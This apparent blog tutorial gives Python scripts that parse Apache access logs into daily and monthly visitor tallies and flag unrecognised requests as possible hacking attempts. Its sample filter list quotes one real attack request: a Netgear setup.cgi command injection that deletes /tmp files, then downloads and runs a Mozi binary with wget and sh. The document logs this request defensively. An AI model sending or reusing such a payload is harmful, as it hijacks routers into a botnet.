Using Apache Log Files for a Visitor Log and for Security

January 29, 2020

It's useful to be able to track the number of visitors to your website. One way is to use some kind of third-party solution, but those often carry undesirable baggage, and it's not difficult to do yourself. One DIY technique involves adding a bit of code, whether JavaScript, PHP, or something else, to each page that might be visited. That code then updates a database of some kind every time the page is loaded.

But there's a simpler solution that makes use of the infrastructure that's already part of the server. As a side benefit, it allows you to track attempts made to hack your site. Lots of these attempts are pretty weak, like trying to read setup.php — maybe that would work on somebody, but really? Others are more clever, and you may find it interesting to see what they are in order to get a better picture of what kind of holes people are looking for.

Apache Logs

Apache produces log files that contain the necessary information for visitor logs, and more. Below, I describe how to extract information from these logs about who is visiting your site, what they are looking at, who might be trying to hack your site, and how they're trying to do it. What follows is what's used on this website, which runs Apache on Debian Linux. If your server is different, then something similar should work, although you may have to modify a few things.

As Apache runs, it produces log files that appear in /var/log/apache2. Periodically, a cron job runs so that these files don't reach an unmanageable length. This cron job executes logrotate, which compresses the old log files, and starts a new set of log files. Precisely how logrotate treats the Apache log files is specified in /etc/logrotate.d/apache2, which has various settings. In my case, it includes the settings daily (run once a day), compress (compress old log files), delaycompress (do not compress the most recent old log file) and rotate 14 (keep up to 14 days of log files).
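For reference, the relevant part of a logrotate configuration with those settings looks something like the following. This is a hand-written sketch rather than a copy of Debian's stock file, whose postrotate command is more elaborate:

/var/log/apache2/*.log {
        daily
        missingok
        rotate 14
        compress
        delaycompress
        notifempty
        postrotate
                systemctl reload apache2 > /dev/null 2>&1 || true
        endscript
}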

The log file we are interested in is access.log. In particular, every time a request is made of the server, this file indicates the IP address of the client that made the request, and what was requested. Other information is logged as well, but these are the two items that matter most when creating a visitor log and keeping on top of security.
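To make the format concrete, here is what a typical line of access.log looks like. The line below is invented for illustration, but the layout matches Apache's default "combined" format:

93.184.216.34 - - [29/Jan/2020:06:25:14 +0000] "GET /overtheyardarm.html HTTP/1.1" 200 5124 "https://www.example.com/" "Mozilla/5.0 (X11; Linux x86_64) Firefox/72.0"

The first field is the client's IP address, and the first quoted string is the request line; those are the two items the script below pulls out.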

Overall Plan

Each day, after logrotate runs, a cron job will digest the most recent old log file. In my case, this is access.log.1. A Python script parses the log file, and tallies the number of unique visitors and what they visited. The script also looks at a file which specifies those pages for which you care to tally visitors, along with a list of known hacking exploits that you want to ignore, presumably because you are confident that they're harmless to your site.

Beware. This approach logs hacking attempts, whether known to be harmless or newly observed, but it doesn't do anything to directly thwart them. If someone does gain unauthorized access, the first thing they'll do is modify the logs to hide their presence. Observing logs is not the way to catch them – although it doesn't hurt, and it's a good learning exercise.

The Workhorse

The script below is what does the bulk of the work. I call it parseapache.py. Half of the lines that appear in the script are comments, so it's not as long as it looks. With so many comments, I'll say no more.

#!/usr/bin/python3

# This parses an apache2 access.log file into information about visitors.
#
# It takes several arguments:
# (1) the name of the log file
# (2) a file which specifies which requests to tally, which to ignore,
#     and which to report as potential hacking attempts
# (3) a file to which new hacking attempts are appended
# (4) a file where the number of times each page is visited is noted
# (5) a file where the IP addresses of visitors and the number of times
#     they loaded something are noted.
#
# The input log file (1) will typically be a path, like
# /var/log/apache2/access.log.1
# See below for the format of file (2). File (3) could be used for
# many days running. Files (4) and (5) should probably be changed each
# time this script is executed since they are overwritten with new data.
#
# There are a variety of ways the information about visitors could be
# tallied. This counts the number of times each page (logged item in
# file (2)) was visited, including multiple visits to that page
# by the same person. If an ip address only made non-logged requests,
# then that address is not counted as a visitor.

import sys
import os

if len(sys.argv) != 6 :
    print("Need the five files to use...")
    sys.exit(1)

logFile = sys.argv[1]
reqFile = sys.argv[2]
hackFile = sys.argv[3]
pageFile = sys.argv[4]
ipFile = sys.argv[5]

if not os.path.exists(logFile) :
    print(logFile + " is not a valid path.")
    sys.exit(1)
if not os.path.exists(reqFile) :
    print(reqFile + " is not a valid path.")
    sys.exit(1)

# Read in a list of the things that are valid for the website.
# This is file of the form
# "valid request" [log]
# The idea is to compare this list with what is actually being
# requested from the server, and use it to generate a tally of what
# people are looking at. If the item is set to 'log', then it should
# be tallied. If 'log' does not appear, then that item is ignored.
# One reason to ignore things is that a particular page might request
# all sorts of data (images are a common example). The user only
# visited the page once, but there may be a whole cascade of requests
# due to that single visit.
#
# For comments, start the line with '#'. It must be the very first
# character of the line. Blank lines are ignored too.
#
# This can also be used as a way to keep ahead of nefarious
# activity. It may be that
# GET /phpmyadmin/scripts/setup.php HTTP/1.1
# is clearly an inappropriate request, but you also know that it's not
# going to cause any problems. Add any requests which are nefarious
# but harmless to the file, but do not set them to 'log'. Then this
# script will only report *new* ways that people are digging around, and
# not old ones that you know are harmless.
#
# Listing the possible requests this way works well for a relatively
# modest and static website, but it's less than ideal once the site
# gets too big. There are various ways that the logic here could be
# extended to handle winnowing out the requests, like using regular
# expressions to match different requests.
#
# The data is stored as a dictionary (associative array) to make
# it easier to look up the log option. There's a second
# dictionary, with the same keys, which counts the number of times
# that request was made.
theFile = open(reqFile)
theHackFile = open(hackFile,"a+")

requestOption = {}
requestCount = {}

for line in theFile :
    if line[0] == '#' : continue
    if len(line) < 5 : continue
    guts = line.split('"')
    guts[2] = guts[2].strip()
    requestOption[guts[1]] = guts[2]
    if guts[2] == 'log' :
        requestCount[guts[1]] = 0

theFile.close()

# What remains is to read in the log file and compare it with the list
# of valid things people might request.

theFile = open(logFile)

# The keys of this dictionary are the IP addresses of non-nefarious
# visitors, and the value is a count of the number of visits made.
visitors = {}

for line in theFile :
    # Each line is parsed using split(). It would probably be more
    # efficient to use regular expressions, but this is easier to
    # understand and modify. 
    
    # The first few characters are the client IP address.
    guts = line.split()
    ip = guts[0]
    if ip not in visitors :
        visitors[ip] = 0

    remains = line[len(ip):]
    
    # The next few fields are uninteresting. There's the identd, which
    # is typically empty (a hyphen), and the user ID, also a hyphen.
    # Then the time, which takes the form [day/month/year:hh:mm:ss].
    # I don't care about that either. So, strip off everything up to 
    # the closing ']'.
    guts = remains.split(']')
    remains = remains[len(guts[0]) + 2:]
    
    # Next is the "request line" from the client. This will typically
    # be of the form "GET ..." It should be trying to get something 
    # nice and expected for your website, but you will also see things like
    # GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1
    # and other things indicating that people are trying to find
    # vulnerabilities.
    #
    # This is where the requestOption dictionary comes in.
    guts = remains.split('"')
    # Skip the occasional malformed line that has no quoted request.
    if len(guts) < 2 :
        continue
    request = guts[1]
    if request not in requestOption :
        theHackFile.write(request + "\n")
    elif requestOption[request] == 'log' :
        requestCount[request] += 1
        visitors[ip] += 1

    # I don't care about anything that remains:
    #
    # Next are two numbers. The first is the status code, which should
    # be something like 200 (if all went well), or things like 404 for
    # page not found. The second number is the size of the file, in
    # bytes.
    #
    # Next, in quotes, is the referrer, which indicates where the user
    # came from to reach this item. It might be a page on your site,
    # or it might be somewhere else.
    #
    # Last, in quotes, is a description of the client's browser and system.
    
theFile.close()
theHackFile.close()

# Done parsing and tallying. Write the output.

# The list of pages visited and the number of visits.
theFile = open(pageFile, "w+")

for item in requestCount.keys() :
    theFile.write(str(requestCount[item]) + " " + item + "\n")

theFile.close()

# And a list of the visitors. For each ip address, this indicates the
# number of items requested. Any nefarious visitors have a count of 
# zero. They requested something, but not anything that is logged.

theFile = open(ipFile,"w+")

for item in visitors.keys() :                  
    if visitors[item] > 0 :
        theFile.write(str(visitors[item]) + " " + item + "\n")

theFile.close()
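Assuming the script is executable and the input files exist, a manual run looks like this. The output file names here are only examples; the cron wrapper further below generates dated names:

./parseapache.py /var/log/apache2/access.log.1 valid_req.txt hackattempt.txt pagevisits.txt visitorips.txt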

The script above reads in a file which is used to distinguish what to tally, what to ignore, and what might be a hacking attempt. Below is an excerpt from my version of this file (the actual file is much longer). Any request which is not listed in the file below will be appended to a "hacking attempt" file by the Python script above. You can look at this output file to help keep the information below up to date. Ideally, the output file listing hacking attempts should be blank. If it's not blank, then you are either facing a new type of hack or you've forgotten to update the information below to include new items that are genuinely part of your website.

# These are the things to be tallied. They all include 'log'.
"GET /overtheyardarm.html HTTP/1.1" log
"GET /generalbahamas.html HTTP/1.1" log
"GET /boatsystems.html HTTP/1.1" log
"GET /current_crossing/modelfrontend.html HTTP/1.1" log

# And stuff to ignore. First, stuff that's my own.
"GET /images/boating.jpg HTTP/1.1"
"GET /images/boat_repair.jpg HTTP/1.1"
"GET /images/yardarm.jpg HTTP/1.1"

# Now, stuff that's not very nefarious, and certainly harmless.
"GET / HTTP/1.1"
"GET / HTTP/1.0"
"GET /robots.txt HTTP/1.1"
"GET /html/public/index.php HTTP/1.1"

# Stuff that's nefarious and/or weird/stupid, but known to be harmless to me.
"GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1"
"GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0"

Producing Summary Counts

The parseapache.py script above needs to run every day, after the Apache logs have been rotated, and it's easiest to set up a cron job to do that. The script below handles calling parseapache.py. It deals with things like choosing names for the various input and output files, and every month it produces summary statistics for the site.
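For instance, a line like the following in root's crontab would run the wrapper each morning, comfortably after Debian's daily cron jobs (including logrotate), which typically start at 06:25. The name runparse.py is just a placeholder for whatever you call the script below:

30 7 * * * /root/bin/runparse.py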

#!/usr/bin/python3

# This manages the way parseapache.py is run each day.
# It should be run as a daily cron job, after logrotate finishes
# rotating the apache logs in /var/log/apache2. If logrotate runs on
# some other schedule, like weekly or hourly, then this script should
# be run on a similar schedule. Because this uses dates to generate
# file names, don't run it at a time that is shortly before midnight.
# 
# This script will digest yesterday's log file, and produce three
# outputs. It will append new hacking attempts to hackattempt.txt,
# and it creates visitoripsYYYYMMDD.txt and pagevisitsYYYYMMDD.txt.
# To run, it needs a file specifying what to log and what to ignore.
# See parseapache.py for a description of these files.
#
# IN ADDITION, this checks to see whether it is being run on the
# first day of the month. If it is, then it also creates a summary
# file for the entire previous month. This is in
# visitsummaryYYYYMM.txt. It has less detailed information than the
# pair of daily files. The first line is the total number of unique IP
# addresses that visited your page in the previous month. If the same
# IP visited every day of the previous month, then it will be counted
# ~30 times. After the first line is the total number of times each
# page was loaded, where a "page" is a logged item as specified by
# valid_req.txt. 

import sys
import os
import glob
import datetime

# Change the working directory to make this easier to run as a cron
# job. Change this as appropriate.
os.chdir("/root/bin")

# This shouldn't change. After logrotate runs, this is the file for the
# previous day.
logFile = "/var/log/apache2/access.log.1"

# These are fixed as well.
reqFile = "valid_req.txt"
hackFile = "hackattempt.txt"

# Generate a string for yesterday's date, in the form YYYYMMDD.
today = datetime.date.today()
yesterday = today - datetime.timedelta(days=1)
datestr = yesterday.strftime("%Y%m%d")

# These are the two daily output files.
pageFile = "pagevisits" + datestr + ".txt"
ipFile = "visitorips" + datestr + ".txt"

# Run the parser. The explicit "./" matters: cron jobs run with a
# minimal PATH, and the working directory was set above.
cmd = ("./parseapache.py " +logFile+ " " +reqFile+ " " +hackFile+ " "
       +pageFile+ " " +ipFile)
os.system(cmd)

# Done with the daily task. See if we should do the monthly summary.
if today.day != 1 :
    sys.exit(0)

# It's the 1st, so do the summary.
# Read in every file from the previous month, and add up the tallies.
# This time the date string is only YYYYMM, so that it matches all of
# the previous month's daily files.
datestr = yesterday.strftime("%Y%m")

# This tallies the number of visits to each page. It uses a dictionary
# where the keys are the pages and the values are the count of visits.
# The counts read from the daily files are strings, so they are
# converted to integers before being summed.
pageTally = {}
for filename in glob.glob("pagevisits" + datestr + "*.txt") :
    theFile = open(filename)
    for tallyLine in theFile :
        guts = tallyLine.split()
        thePage = tallyLine[len(guts[0]):].strip()
        if thePage in pageTally :
            pageTally[thePage] += int(guts[0])
        else :
            pageTally[thePage] = int(guts[0])
    theFile.close()

# Tally the number of visitors. Each visitorips file is a list of
# unique IPs and the number of times that IP loaded something. All we
# want is the number of lines in each file, so count the total number
# of lines in all the visitorips files for the previous month.
visitCount = 0
for filename in glob.glob("visitorips" + datestr + "*.txt") :
    theFile = open(filename)
    visitCount += len(theFile.readlines())
    theFile.close()

# Write the data to a file.
outFile = open("visitsummary" +datestr+ ".txt","w")

outFile.write(str(visitCount) + "\n")

for item in pageTally.keys() :
    outFile.write(str(pageTally[item]) + " " + item + "\n")

outFile.close()

Improvements

These scripts work, but I may revisit the topic. Part of the reason it was done this way is to facilitate close observation of exactly what Apache is doing. The strategy above produces output that's not as pretty as it could be, and it takes more periodic maintenance than I would like. On the plus side, it's easy to understand and it allows you to examine, in an organized way, every request that the server sees.